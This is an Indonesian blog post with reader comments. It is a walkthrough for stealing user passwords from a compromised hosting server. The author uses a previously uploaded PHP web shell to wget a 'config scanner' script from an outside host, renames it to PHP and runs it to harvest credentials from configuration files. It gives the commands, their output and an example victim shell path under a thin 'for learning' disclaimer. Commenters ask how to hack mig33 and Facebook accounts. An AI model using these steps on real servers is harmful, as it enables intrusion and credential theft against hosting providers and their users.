Mendapatkan Password User menggunakan Config Scanner
Dalam artikel ini kita akan mencoba mencari dan mendapatkan password dari user yang berada pada suatu hosting server, dengan bermodalkan shell hasil injectan kita, sapa tau kita bisa mendapatkan password sebenarnya dari user tersebut.
CATATAN : Saya tidak bertanggung jawab atas penyalah gunaan artikel ini, semuanya hanyalah untuk proses pembelajaran
Ok, tanpa basa-basi saya mulai saja.
Yang perlu di persiapkan :
1. Seperti biasa, komputer yang terkoneksi ke internet.
2. Shell atau website hasil injectan kita. ( saya anggap rekan-rekan sudah tau gimana cara mendapatkannya )
3. Source untuk Scan file-file configurasi yang memuat informasi user dan password. dapat di download di http://wawan.22web.net/download/sConfig.txt
4. Segelas Cofeemix dan Sebungkus Sampoerna Mild. heheh
Praktek :
1. Buka Shell atau website injectan anda, ( catatan : file ini harus di upload ke dalam server yang akan kita scan user nya )
Contoh :
http://www.xxxhosting.us/phpwebsite/images/javascript/wysiwyg/display.php
( sebelumnya saya sudah upload phpshell ke dalam server tersebut )
2. Download file sConfig.txt dari http://wawan.22web.net/download/sConfig.txt ( file ini bisa berada dimana saja dalam server target, tentunya dalam folder yang mempunyai permission terhadap user yang kita gunakan skarang )
wget http://wawan.22web.net/download/sConfig.txt
##########################################################
wget wawan.22web.net/download/sConfig.txt
--03:59:52-- http://wawan.22web.net/download/sConfig.txt
=> `sConfig.txt'
Resolving wawan.22web.net... done.
Connecting to wawan.22web.net[209.51.196.242]:80...
connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
0K .....
184.39 KB/s
03:59:52 (184.39 KB/s) - `sConfig.txt' saved [6042] #######################################################
Setelah sukses men-download file sConfig.txt, rename file tersebut menjadi sConfig.php ( source codenya dalam bentuk PHP )
3. Jalankan file tersebut,
php sConfig.php
######################################################
mv sConfig.txt sConfig.php
php sConfig.php
Content-type: text/html
X-Powered-By: PHP/4.3.10
echo "";
?>
5 comments:
alamat yg anda berikan u/ file injectkan nggak bisaa
ksih tau cranya ngehack id di mig33 dumk pak..
Asal copy paste aja lho,,,,, klo dah bisa upload ke server tersebut,,, ngapain sibuk lagi cr password ganti aja passwordnya terus pakai password baru itu,,, sibuk amattttttttttt
cara nge uplod nya e server gmn?
klo misal nya ke facebook, nah nge uplod php ke server nya gmn?
ada alamat2 server yg biasa di pake bt uplod script itu gk? buat bhan percobaan aja.
Hati-hati.. ini penipuan.. jangan sampai akun anda sendiri yg di hack sama manusia satu nie.. hahahaha
Post a Comment